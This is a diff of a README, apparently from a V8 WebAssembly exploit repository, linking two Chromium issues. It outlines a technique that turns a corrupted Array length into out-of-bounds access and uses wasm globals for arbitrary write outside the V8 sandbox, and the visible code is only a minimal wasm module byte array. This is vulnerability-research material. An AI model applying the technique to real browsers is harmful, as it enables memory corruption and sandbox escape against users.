lanleft/v8-wasm/readme.md

   - https://issues.chromium.org/issues/40068627
   - https://issues.chromium.org/issues/41482162

-this idea demonstrates how to gain relative out-of-bound (OOB) read/write access by manipulating the length of an Array object.
+This idea demonstrates how to gain relative out-of-bound (OOB) read/write access by manipulating the length of an Array object.
 The solution involved manipulating WebAssembly's use of global variables to achieve arbitrary write access outside of the cage.

 ```js
 var wasm_code2 = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);